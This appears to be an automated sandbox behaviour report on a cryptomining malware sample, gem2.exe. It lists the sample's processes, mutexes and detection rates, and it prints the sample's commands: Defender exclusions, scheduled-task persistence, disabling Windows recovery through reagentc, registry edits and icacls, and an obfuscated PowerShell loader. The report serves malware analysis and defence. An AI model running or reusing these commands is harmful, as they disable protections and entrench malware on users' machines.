Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B04A616_2_00000173D01B04A6
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01749E016_2_00000173D01749E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A6B5016_2_00000173D01A6B50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019FE3016_2_00000173D019FE30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019A3A016_2_00000173D019A3A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018A4A416_2_00000173D018A4A4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A74F016_2_00000173D01A74F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018B4E016_2_00000173D018B4E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018F50016_2_00000173D018F500
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A867016_2_00000173D01A8670
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01816F016_2_00000173D01816F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018C7B016_2_00000173D018C7B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018AA5216_2_00000173D018AA52
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D017BA4016_2_00000173D017BA40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A2B6016_2_00000173D01A2B60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0162B8016_2_00000173D0162B80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0161C3016_2_00000173D0161C30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0163D5016_2_00000173D0163D50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A3D8016_2_00000173D01A3D80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019CDD016_2_00000173D019CDD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018BE3016_2_00000173D018BE30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01ACEC016_2_00000173D01ACEC0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D016EFC016_2_00000173D016EFC0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0163FE016_2_00000173D0163FE0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A00D016_2_00000173D01A00D0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D015F0C016_2_00000173D015F0C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03C404816_2_00000173D03C4048
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BD88016_2_00000173D03BD880
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03B2DDC16_2_00000173D03B2DDC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164E28817_2_00007FF7D164E288
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D169330817_2_00007FF7D1693308
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167F2C817_2_00007FF7D167F2C8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164717C17_2_00007FF7D164717C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D163612017_2_00007FF7D1636120
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167542017_2_00007FF7D1675420
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164537817_2_00007FF7D1645378
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D16773BC17_2_00007FF7D16773BC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166A6D417_2_00007FF7D166A6D4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164A6B417_2_00007FF7D164A6B4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166B55C17_2_00007FF7D166B55C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164E55017_2_00007FF7D164E550
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167452017_2_00007FF7D1674520
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168559817_2_00007FF7D1685598
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B84817_2_00007FF7D168B848
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164E84417_2_00007FF7D164E844
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D16528E017_2_00007FF7D16528E0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166975C17_2_00007FF7D166975C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D163676017_2_00007FF7D1636760
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165074417_2_00007FF7D1650744
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167472417_2_00007FF7D1674724
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167EA8C17_2_00007FF7D167EA8C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1687A8817_2_00007FF7D1687A88
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167DA5017_2_00007FF7D167DA50
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165FAF817_2_00007FF7D165FAF8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1675AB417_2_00007FF7D1675AB4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166498817_2_00007FF7D1664988
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168196817_2_00007FF7D1681968
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167492817_2_00007FF7D1674928
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165C9A817_2_00007FF7D165C9A8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1657C3017_2_00007FF7D1657C30
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1685C1817_2_00007FF7D1685C18
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1645CEC17_2_00007FF7D1645CEC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1663CDC17_2_00007FF7D1663CDC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168DB6017_2_00007FF7D168DB60
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1678B5817_2_00007FF7D1678B58
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165BB2817_2_00007FF7D165BB28
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1662BFC17_2_00007FF7D1662BFC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168CBD817_2_00007FF7D168CBD8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1680BAC17_2_00007FF7D1680BAC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165AE8417_2_00007FF7D165AE84
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1651E6C17_2_00007FF7D1651E6C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168AE2817_2_00007FF7D168AE28
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1686F1017_2_00007FF7D1686F10
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1675EEC17_2_00007FF7D1675EEC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1690EC017_2_00007FF7D1690EC0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165ED1817_2_00007FF7D165ED18
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1658E1017_2_00007FF7D1658E10
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1676DD017_2_00007FF7D1676DD0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1667D9817_2_00007FF7D1667D98
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167508817_2_00007FF7D1675088
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164907717_2_00007FF7D1649077
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168F07017_2_00007FF7D168F070
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167906417_2_00007FF7D1679064
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164F01C17_2_00007FF7D164F01C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168510417_2_00007FF7D1685104
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165D0DC17_2_00007FF7D165D0DC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B0A417_2_00007FF7D168B0A4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167AF9017_2_00007FF7D167AF90
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168CBD817_2_00007FF7D168CBD8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1668FC717_2_00007FF7D1668FC7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86DD5831_2_00007FFAAC86DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86F63E31_2_00007FFAAC86F63E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86DCE531_2_00007FFAAC86DCE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86F65931_2_00007FFAAC86F659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86FDE931_2_00007FFAAC86FDE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86E32931_2_00007FFAAC86E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAACAE96B931_2_00007FFAACAE96B9
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164A70 appears 478 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D019E230 appears 37 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D019E2A0 appears 83 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164B60 appears 330 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0184EB0 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D01A3D10 appears 31 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164BB0 appears 52 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D01946D0 appears 45 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164D20 appears 44 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0184D90 appears 42 times
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: String function: 00007FF6A54AC610 appears 42 times
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: String function: 00007FF7D163C610 appears 42 times
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: unknown, Process created: Commandline size = 5526
Source: classification engine, Classification label: mal100.evad.mine.winEXE@73/18@7/8
Source: C:\Windows\System32\svchost.exe, Code function: 16_2_00000173CFC0A920 GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe, Code function: 17_2_00007FF7D1637ED0 CreateToolhelp32Snapshot,Process32FirstW,Concurrency::details::WorkQueue::IsStructuredEmpty,Concurrency::details::WorkQueue::IsStructuredEmpty,CloseHandle,Process32NextW,CloseHandle
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 25_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 25_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW
Source: C:\Users\user\Desktop\gem2.exe, File created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
Source: C:\Users\user\Desktop\gem2.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cGFzdGVzbmFwM[1].txt
Source: C:\Windows\System32\svchost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\f4855f59e0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4716:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\e788d6624a
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Users\user\Desktop\gem2.exe, Process created: C:\Windows\SysWOW64\explorer.exe
Source: gem2.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gem2.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: gem2.exe, ReversingLabs: Detection: 52%
Source: gem2.exe, Virustotal: Detection: 62%
Source: C:\Users\user\Desktop\gem2.exe, File read: C:\Users\user\Desktop\gem2.exe
Source: unknown, Process created: C:\Users\user\Desktop\gem2.exe "C:\Users\user\Desktop\gem2.exe"
Source: C:\Users\user\Desktop\gem2.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\gem2.exe, Process created: C:\Windows\System32\schtasks.exe SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
Source: C:\Windows\System32\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Windows\System32\System-f4855f59e0.exe C:\Windows\System32\System-f4855f59e0.exe
Source: C:\Users\user\Desktop\gem2.exe, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe
Source: unknown, Process created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\powercfg.exe powercfg -change standby-timeout-ac 0
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\powercfg.exe powercfg -change monitor-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\powercfg.exe powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\powercfg.exe powercfg /setactive SCHEME_CURRENT
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe, Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\cmd.exe cmd.exe /C reagentc /disable
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\ReAgentc.exe reagentc /disable
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99
)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\cmd.exe cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe"
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\cmd.exe cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\cmd.exe cmd.exe /C takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\cmd.exe cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\cmd.exe cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\curl.exe curl -s https://api.ipify.org
Source: C:\Windows\System32\curl.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc /disableJump to behavior
